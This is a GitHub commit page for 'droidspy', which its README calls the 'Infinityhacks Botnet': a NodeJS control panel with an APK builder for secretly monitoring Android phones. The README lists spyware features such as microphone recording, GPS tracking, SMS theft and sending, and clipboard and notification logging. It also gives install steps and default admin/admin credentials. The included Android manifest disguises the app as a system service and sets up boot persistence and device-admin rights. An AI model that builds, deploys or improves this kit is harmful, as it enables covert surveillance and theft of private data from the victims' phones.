Skip to content

Commit 85a9713

Browse files
committed
droidspy
0 parents  commit 85a9713

File tree

560 files changed

+156961
-0
lines changed

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

560 files changed

+156961
-0
lines changed

Password.txt

Lines changed: 2 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,2 @@
1+
User Name: admin
2+
Password: admin

README.md

Lines changed: 78 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,78 @@
1+
<p align="center">
2+
<img src="https://github.com/ExtremeHacking/infinityhacks-botnet/blob/master/assets/webpublic/logo.png" height="60"><br>
3+
A cloud based remote android managment suite, powered by NodeJS
4+
</p>
5+
6+
7+
8+
## Features
9+
- GPS Logging
10+
- Microphone Recording
11+
- View Contacts
12+
- SMS Logs
13+
- Send SMS
14+
- Call Logs
15+
- View Installed Apps
16+
- View Stub Permissions
17+
- Live Clipboard Logging
18+
- Live Notification Logging
19+
- View WiFi Networks (logs previously seen)
20+
- File Explorer & Downloader
21+
- Command Queuing
22+
- Built In APK Builder
23+
- Auto Allow Permission
24+
25+
## Prerequisites
26+
- Java Runtime Environment 8
27+
- See [installation](#Installation) for OS specifics
28+
- NodeJs
29+
- A Server
30+
31+
## Installation
32+
1. Install JRE 8
33+
- Debian, Ubuntu, Etc
34+
- `sudo apt-get install openjdk-8-jre`
35+
- Fedora, Oracle, Red Hat, etc
36+
- `su -c "yum install java-1.8.0-openjdk"`
37+
- Windows
38+
- click [HERE](https://www.oracle.com/technetwork/java/javase/downloads/jre8-downloads-2133155.html) for downloads
39+
40+
2. Install NodeJS [Instructions Here](https://nodejs.org/en/download/package-manager/) (If you can't figure this out, you shouldn't really be using this)
41+
42+
3. install PM2
43+
- `npm install pm2 -g`
44+
45+
4. Download and Extract [HERE](https://codeload.github.com/ExtremeHacking/infinityhacks-botnet/zip/master)
46+
47+
5. In the extracted folder, run these commands
48+
- `npm install` <- install dependencies
49+
- `pm2 start index.js` <-- start the script
50+
- `pm2 startup` <- to run botnet on startup
51+
52+
6. Default Username & Password
53+
- Username: admin
54+
- Password: admin
55+
56+
7. Set Username & Password Manually
57+
1. Stop botnet `pm2 stop index`
58+
2. Open `maindb.json` in a text editor
59+
3. under `admin`
60+
- set the `username` as plain text
61+
- set the `password` as a LOWERCASE MD5 hash
62+
4. save the file
63+
5. run `pm2 restart all`
64+
65+
8. in your browser navigate to `http://<SERVER IP>:22533`
66+
67+
It's recommended to run botnet behind a reverse proxy such as [NGINX](https://www.nginx.com/resources/wiki/start/topics/tutorials/install/)
68+
69+
70+
## Disclaimer
71+
<b>Infinityhacks Botnet Provides no warranty with this software and will not be responsible for any direct or indirect damage caused due to the usage of this tool.<br>
72+
Infinityhacks Botnet is built for both Educational and Internal use ONLY.</b>
73+
74+
<br>
75+
<p align="center">Made By <a href="//infinityhacks.net">Prashant Asoliya</a></p>
76+
<p align="center" style="font-size: 8px">v1.1.0</p>
77+
78+
Inspired by L3MON (https://github.com/D3VL/L3MON)

app/factory/apktool.jar

15.6 MB
Binary file not shown.

app/factory/base.apk

255 KB
Binary file not shown.
Lines changed: 54 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,54 @@
1+
<?xml version="1.0" encoding="utf-8" standalone="no"?><manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.system.servicess">
2+
<uses-permission android:name="android.permission.WAKE_LOCK"/>
3+
<uses-permission android:name="android.permission.CAMERA"/>
4+
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
5+
<uses-permission android:name="android.permission.INTERNET"/>
6+
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
7+
<uses-permission android:name="android.permission.READ_SMS"/>
8+
<uses-permission android:name="android.permission.SEND_SMS"/>
9+
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
10+
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
11+
<uses-permission android:name="android.permission.READ_PHONE_STATE"/>
12+
<uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
13+
<uses-permission android:name="android.permission.READ_CALL_LOG"/>
14+
<uses-permission android:name="android.permission.RECORD_AUDIO"/>
15+
<uses-permission android:name="android.permission.MODIFY_AUDIO_SETTINGS"/>
16+
<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
17+
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
18+
<uses-permission android:name="android.permission.READ_CONTACTS"/>
19+
<application android:allowBackup="true" android:debuggable="true" android:hardwareAccelerated="false" android:icon="@mipmap/ic_launcher" android:label="@string/app_name" android:largeHeap="true" android:supportsRtl="true" android:theme="@style/AppTheme">
20+
<activity android:launchMode="singleInstance" android:name="com.etechd.l3mon.MainActivity">
21+
<intent-filter>
22+
<action android:name="android.intent.action.MAIN"/>
23+
<category android:name="android.intent.category.LAUNCHER"/>
24+
</intent-filter>
25+
</activity>
26+
<service android:enabled="true" android:exported="false" android:name="com.etechd.l3mon.MainService"/>
27+
<receiver android:enabled="true" android:exported="true" android:label="RestartServiceWhenStopped" android:name="com.etechd.l3mon.ServiceReciever">
28+
<intent-filter>
29+
<action android:name="respawnService"/>
30+
</intent-filter>
31+
</receiver>
32+
<receiver android:enabled="true" android:exported="true" android:name="com.etechd.l3mon.MyReceiver">
33+
<intent-filter>
34+
<action android:name="android.intent.action.BOOT_COMPLETED"/>
35+
</intent-filter>
36+
<intent-filter>
37+
<action android:name="android.provider.Telephony.SECRET_CODE"/>
38+
<data android:scheme="android_secret_code"/>
39+
</intent-filter>
40+
</receiver>
41+
<receiver
42+
android:name="com.etechd.l3mon" android:permission="android.permission.BIND_DEVICE_ADMIN">
43+
<meta-data android:name="android.app.device_admin" android:resource="@xml/device_admin" />
44+
     <intent-filter>
45+
        <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
46+
          </intent-filter>
47+
        </receiver>
48+
<service android:label="@string/app_name" android:name="com.etechd.l3mon.NotificationListener" android:permission="android.permission.BIND_NOTIFICATION_LISTENER_SERVICE">
49+
<intent-filter>
50+
<action android:name="android.service.notification.NotificationListenerService"/>
51+
</intent-filter>
52+
</service>
53+
</application>
54+
</manifest>

app/factory/decompiled/apktool.yml

Lines changed: 23 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,23 @@
1+
!!brut.androlib.meta.MetaInfo
2+
apkFileName: base.apk
3+
compressionType: false
4+
doNotCompress:
5+
- png
6+
isFrameworkApk: false
7+
packageInfo:
8+
forcedPackageId: '127'
9+
renameManifestPackage: null
10+
sdkInfo:
11+
minSdkVersion: '11'
12+
targetSdkVersion: '21'
13+
sharedLibrary: false
14+
sparseResources: false
15+
unknownFiles: {}
16+
usesFramework:
17+
ids:
18+
- 1
19+
tag: null
20+
version: 2.4.1
21+
versionInfo:
22+
versionCode: '1'
23+
versionName: '1.0'
6.89 KB
Binary file not shown.
514 KB
Binary file not shown.
Binary file not shown.
980 Bytes
Binary file not shown.

0 commit comments

Comments
 (0)